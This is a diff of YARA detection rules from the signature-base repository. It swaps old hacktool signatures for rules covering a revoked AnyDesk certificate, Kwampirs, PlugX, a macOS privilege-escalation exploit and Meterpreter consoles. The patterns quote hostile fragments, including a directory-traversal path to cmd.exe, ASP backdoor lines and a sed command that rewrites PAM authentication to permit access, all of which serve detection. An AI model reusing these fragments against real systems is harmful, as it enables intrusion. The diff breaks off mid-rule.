+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8) after it was revoked. This is not a threat detection. It detects an outdated version of AnyDesk that was signed with a certificate that has been revoked."
+		author = "Florian Roth"
+		id = "eeefc9a5-1416-544b-b95e-c063000a4028"
+		date = "2024-02-05"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L3-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
-		logic_hash = "fd17851820b5036b4cc1ebb6f927bb62c898027a17b5376e9420cbfa6a166ef2"
-		score = 60
+		logic_hash = "a1f148dbf15579bd6a65e7c93fa64f00ea481d6b314a444fa924a4604adb9a6d"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
-		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
-		$s7 = "Cerberus NBTDUMP" fullword ascii
-		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
-		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
-		$s19 = "%s's password is %s</H3>" fullword wide
-		$s20 = "%s's password is blank</H3>" fullword wide
+		tags = "FILE"
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
 }
-rule SIGNATURE_BASE_Sig_238_Glass2K
+
+rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7a2ad37a-6b55-5710-b07d-7c289cdbb04e"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2459-L2476"
+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; strict version)"
+		author = "Florian Roth"
+		id = "8d172b04-f7f7-54df-b30c-3ee17d3cca12"
+		date = "2024-02-02"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L19-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
-		logic_hash = "d9b6b904028d67804d095f85caea5796f528f866191d3b4250055a75511f2090"
-		score = 60
+		logic_hash = "1b2268b1efa09ee8578f4c1ae07617ac6bebeacd3ed50598a2fc2ec4d709baa7"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
-		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
-		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
-		$s4 = "Glass2k.exe" fullword wide
-		$s7 = "NeoLite Executable File Compressor" fullword ascii
+		$a1 = "AnyDesk Software GmbH" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and not $a1 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
 }
-rule SIGNATURE_BASE_Splitjoin_V1_3_3_Rar_Folder_3
+rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_2 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4ffd7501-339c-52b7-8661-2c3ca57dfa1f"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2478-L2493"
+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; permissive version)"
+		author = "Florian Roth"
+		id = "a41af8d8-ebdf-5a2f-8cf5-abd4587bdfc5"
+		date = "2024-02-02"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L38-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "21409117b536664a913dcd159d6f4d8758f43435"
-		logic_hash = "79eb49413cd6919e4b91e916d2612e007fd2c4da7244d9e1e3dd04d46c461d8c"
-		score = 60
+		logic_hash = "86f708233d5a6a46d367430dcc65b128e8dc7ec24eda774ff3860101cc16c9fc"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s2 = "ie686@sohu.com" fullword ascii
-		$s3 = "splitjoin.exe" fullword ascii
-		$s7 = "SplitJoin" fullword ascii
+		$sc1 = { 0D BF 15 2D EA F0 B9 81 A8 A9 38 D5 3F 76 9D B8 }
+		$s2 = "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1"
+		$f1 = "AnyDesk Software GmbH" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of ( $s* ) and not 1 of ( $f* )
 }
-rule SIGNATURE_BASE_Aspbackdoor_EDIT
+
+rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_3 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cdcec370-97af-51c0-b81a-35a788f16ef4"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2495-L2514"
+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk after it was revoked (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; version that uses dates for validation)"
+		author = "Florian Roth"
+		id = "9610e61c-25d7-53e8-ba3f-b78b3d108aa3"
+		date = "2024-02-02"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anydesk_compromised_cert_feb23.yar#L58-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
-		logic_hash = "0f97c831eb9f257a2a6c9a677dde2ce17d529584fb7085bc94edd83d886e469f"
-		score = 60
+		logic_hash = "fdd1068abfba52c9a40fd2b6628a5c67775eb31815e6d53bfc4655080d9b240e"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
-		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
-		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
-		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
-		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
-		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
-		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
+		tags = "FILE"
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" and ( pe.signatures [ i ] . not_before > 1706486400 or pe.timestamp > 1706486400 ) )
 }
-rule SIGNATURE_BASE_Aspbackdoor_Entice
+rule SIGNATURE_BASE_MAL_Kwampirs_Apr18 : KWAMPIRS
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file entice.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "68c61920-9c3c-5bfe-976c-346b258bb406"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2516-L2533"
+		description = "Kwampirs dropper and main payload components"
+		author = "Symantec"
+		id = "298e2868-e90e-55b4-9115-9f0b43521266"
+		date = "2018-04-23"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kwampirs.yar#L1-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
-		logic_hash = "c11313351565d26d9b16a2d5c3c4589676593fe633c441a1c1a33b3c134a2d56"
-		score = 60
+		logic_hash = "e9387c46b9e3fff90415c46af270d143bdeb6292f2521d889b8d6ae726a4cf3b"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "KWAMPIRS"
+		family = "Kwampirs"
 
 	strings:
-		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
-		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
-		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
-		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
-		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
+		$pubkey = {
+            06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00
+            01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5
+            97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9
+            E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31
+            48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A
+            CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11
+            56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33
+            02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2
+            9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28
+            4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B
+            4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71
+            6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9
+            59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36
+            EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
+            C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6
+            FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D
+            90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF
+            F7 E4 0C B3
+        }
+		$network_xor_key = {
+            B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38
+            C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0
+            91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58
+            C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68
+            CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B
+            8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02
+            D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9
+            62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B
+            10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E
+            BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83
+            3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B
+            A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91
+            75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C
+            A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7
+            45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F
+            DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33
+        }
+		$decrypt_string = {
+            85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74
+            4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9
+            40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51
+            E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB
+            74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38
+            40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3
+            32 C0 C3
+        }
+		$init_strings = {
+            55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00
+            00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8
+            B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02
+            10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02
+            10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00
+            00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06
+        }
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Fpipe2_0
+rule SIGNATURE_BASE_Plugx_J16_Gen : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
+		description = "Detects PlugX Malware samples from June 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e104cf6-69d2-590e-8999-4f0d448719f2"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2535-L2553"
+		id = "13ef1e80-7090-5a1e-bca7-8d3de0dc2247"
+		date = "2016-06-08"
+		modified = "2023-12-05"
+		reference = "VT Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_win_plugx.yar#L10-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "891609db7a6787575641154e7aab7757e74d837b"
-		logic_hash = "b28566315ddda7765dfee722f5ad02c1206c6916363d86407fdc61b53148f511"
-		score = 60
+		logic_hash = "3e988243663264b2647e098e36b83dd675141fa9765c9bd47c30f29bf176cd8f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
-		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
-		$s2 = " -s    - outbound connection source port number" fullword ascii
-		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
-		$s4 = "http://www.foundstone.com" fullword ascii
-		$s19 = "FPipe" fullword ascii
+		$x1 = "%WINDIR%\\SYSTEM32\\SERVICES.EXE" fullword wide
+		$x2 = "\\\\.\\PIPE\\RUN_AS_USER(%d)" fullword wide
+		$x3 = "LdrLoadShellcode" fullword ascii
+		$x4 = "Protocol:[%4s], Host: [%s:%d], Proxy: [%d:%s:%d:%s:%s]" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\User Agent\\Post Platform" fullword wide
+		$s2 = "%s\\msiexec.exe %d %d" fullword wide
+		$s3 = "l%s\\sysprep\\CRYPTBASE.DLL" fullword wide
+		$s4 = "%s\\msiexec.exe UAC" fullword wide
+		$s5 = "CRYPTBASE.DLL" fullword wide
+		$s6 = "%ALLUSERSPROFILE%\\SxS" fullword wide
+		$s7 = "%s\\sysprep\\sysprep.exe" fullword wide
+		$s8 = "\\\\.\\pipe\\a%d" fullword wide
+		$s9 = "\\\\.\\pipe\\b%d" fullword wide
+		$s10 = "EName:%s,EAddr:0x%p,ECode:0x%p,EAX:%p,EBX:%p,ECX:%p,EDX:%p,ESI:%p,EDI:%p,EBP:%p,ESP:%p,EIP:%p" fullword ascii
+		$s11 = "Mozilla/4.0 (compatible; MSIE " fullword wide
+		$s12 = "; Windows NT %d.%d" fullword wide
+		$s13 = "SOFTWARE\\Microsoft\\Internet Explorer\\Version Vector" fullword wide
+		$s14 = "\\bug.log" wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 8 of them )
 }
-rule SIGNATURE_BASE_Instgina
+rule SIGNATURE_BASE_Plugx_J16_Gen2 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
+		description = "Detects PlugX Malware Samples from June 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ccbda689-e61a-501d-a8ed-62e3c1c20289"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2555-L2570"
+		id = "28e9cbb9-cd60-555d-b033-4e2bf293adf2"
+		date = "2016-06-08"
+		modified = "2023-12-05"
+		reference = "VT Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_win_plugx.yar#L42-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
-		logic_hash = "a55a13ced122b9901f0505d585e7a7c984d4231b3507282c1b15ff400ce51265"
-		score = 60
+		logic_hash = "8fbe90cbff5d408d26b0a5ace6833a0e3100d11ff544184d9ccc2f39ee806de9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "To Open Registry" fullword ascii
-		$s4 = "I love Candy very much!!" ascii
-		$s5 = "GinaDLL" fullword ascii
+		$s1 = "XPlugKeyLogger.cpp" fullword ascii
+		$s2 = "XPlugProcess.cpp" fullword ascii
+		$s4 = "XPlgLoader.cpp" fullword ascii
+		$s5 = "XPlugPortMap.cpp" fullword ascii
+		$s8 = "XPlugShell.cpp" fullword ascii
+		$s11 = "file: %s, line: %d, error: [%d]%s" fullword ascii
+		$s12 = "XInstall.cpp" fullword ascii
+		$s13 = "XPlugTelnet.cpp" fullword ascii
+		$s14 = "XInstallUAC.cpp" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Arttray_Zip_Folder_Arttray
+rule SIGNATURE_BASE_EXPL_HKTL_Macos_Switcharoo_CVE_2022_46689_Dec22 : CVE_2022_46689 FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
+		description = "Detects POCs that exploit privilege escalation vulnerability CVE-2022-46689 on macOS"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d29909a4-8663-54c7-8f0e-68b15def869f"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2572-L2588"
+		id = "25c551f7-48ae-5e71-b86e-68fb440262e5"
+		date = "2022-12-19"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_macos_switcharoo_dec22.yar#L2-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
-		logic_hash = "225be71bfd047331399162941edf06c72d2fd1afa04c78cbc51099665f50883b"
-		score = 60
+		logic_hash = "c2cbe12a01a38db522c49143c5168d3519ef974b4e6157cb251aa66707c69d78"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-46689, FILE"
+		hash1 = "64acd79a37b6f8443250dd33e95bd933ee39fc6d4f35ba6a987dae878d017386"
+		hash2 = "6c2ace75000de8a7e8786f28b1b41eed72816991a0961475c6800753bfe9278c"
+		hash3 = "6ce080b236ea3aa3b4c992d12af99445ab800abc709c6abbef852a9f0cf219b6"
+		hash4 = "83cc4d72686aedf5218f07e60e759b4849b368975b70352dbba6fac4e8cde72b"
+		hash5 = "a7b7fcfd609ff653d32c133417c0d3ffd9f581fb6de05ddbdead4d36cb6e3cc2"
+		hash6 = "b2a97edb0ddc30ecc1a0b0c0739820bbef787394b44ab997393475de2ebf7b60"
+		hash7 = "c7a64c6da5cf5046ae5c683d0264a32027110a2736b4c1b0df294e29a061a865"
+		hash8 = "d517cde0d45e6930336538c89b310d5d540a66c921bf6f6f9b952e721b2f6a11"
+		hash9 = "d53a559ea9131fe42eacf51431da3adde5a8fd5c2f3198f0d5451ef62ed33888"
 
 	strings:
-		$s0 = "http://www.brigsoft.com" fullword wide
-		$s2 = "ArtTrayHookDll.dll" fullword ascii
-		$s3 = "ArtTray Version 1.0 " fullword wide
-		$s16 = "TRM_HOOKCALLBACK" fullword ascii
+		$x1 = "vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d" ascii fullword
+		$x2 = "Execting: %s (posix_spawn returned: %d)" ascii fullword
+		$x3 = "/usr/bin/sed -e \"s/rootok/permit/g\" /etc" ascii fullword
+		$x4 = "vm_unaligned_copy_switch_race" ascii fullword
+		$s1 = "RO mapping was modified" ascii fullword
+		$s2 = "Ran %d times in %ld seconds with no failure" ascii fullword
+		$opa1 = { 4c 89 ee 31 c9 41 b8 00 40 00 00 6a 01 41 5c 41 54 6a 03 58 }
+		$opa2 = { e8 ?? 01 00 00 48 8b 05 ?? 0? 00 00 8b 38 48 8b 13 44 8b 4b 14 48 83 ec 08 4c 89 ee 31 c9 }
+		$opa3 = { 48 89 45 c8 48 8d 43 08 48 89 45 d0 4c 8b 7d c8 4c 8b 6d d0 6a 64 41 5e 80 7b 60 00 }
+		$opb1 = { 55 48 89 e5 48 83 ec 60 48 8b 05 ?1 06 00 00 48 8b 00 48 89 45 f8 0f 28 05 ?b 07 00 00 48 8d 75 d0 }
 
 	condition:
-		all of them
+		( filesize < 400KB and 1 of ( $x* ) ) or ( ( uint16( 0 ) == 0xfacf or ( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) ) and filesize < 400KB and 2 of them )
 }
-rule SIGNATURE_BASE_Sig_238_Findoor
+rule SIGNATURE_BASE_EXPL_Macos_Switcharoo_Indicator_Dec22 : CVE_2022_46689 FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
+		description = "Detects indicators found after exploitations of CVE-2022-46689"
 		author = "Florian Roth (Nextron Systems)"
-		id = "61215a76-8c29-505d-bfef-a5f13fec476c"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2590-L2607"
+		id = "d5d9559a-c19c-5ddc-9d72-701986a9d7ac"
+		date = "2022-12-19"
+		modified = "2023-12-05"
+		reference = "https://github.com/zhuowei/MacDirtyCowDemo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_macos_switcharoo_dec22.yar#L42-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
-		logic_hash = "223f324ab6b61775d500dc248b9db8363ce915ec279a893a6f0ec92b273a27c0"
-		score = 60
+		logic_hash = "9b9ea134fc4b3a7b15ae585ced2e12cbe1defc54bc6175282d6b7a2a0b65abd1"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-46689, FILE"
 
 	strings:
-		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
-		$s8 = "PASS hacker@hacker.com" fullword ascii
-		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
-		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
-		$s11 = "http://isno.yeah.net" fullword ascii
+		$x1 = "auth       sufficient     pam_permit.so" ascii
 
 	condition:
-		4 of them
+		filesize < 1KB and $x1
 }
-rule SIGNATURE_BASE_Aspbackdoor_Ipclear
+rule SIGNATURE_BASE_Armitage_Msfconsole : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+		description = "Detects Armitage component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71ebecea-721f-5c5d-9997-6a57f070d91c"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2609-L2626"
+		id = "9c610cd0-663e-54ea-a0f2-6c044fc45d23"
+		date = "2017-12-24"
+		modified = "2022-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_armitage.yar#L14-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
-		logic_hash = "49fbe844a99aa8cae25db90e1d8cdeee13c81293bba7b3201afc4748cb0a6a7c"
-		score = 60
+		logic_hash = "cf9df9858ca584288288fd0b55fdcf65aeea410f25531ee3d8cf48c30d23824a"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a"
 
 	strings:
-		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
-		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
-		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
-		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
-		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s1 = "\\umeterpreter\\u >" ascii
+		$s3 = "^meterpreter >" fullword ascii
+		$s11 = "\\umsf\\u>" ascii
 
 	condition:
-		all of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_Wineggdropshellfinal_Zip_Folder_Injectt
+rule SIGNATURE_BASE_Armitage_Meterpretersession_Strings : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		description = "Detects Armitage component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16f04551-050f-5a07-a35b-a3a7dbba6803"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
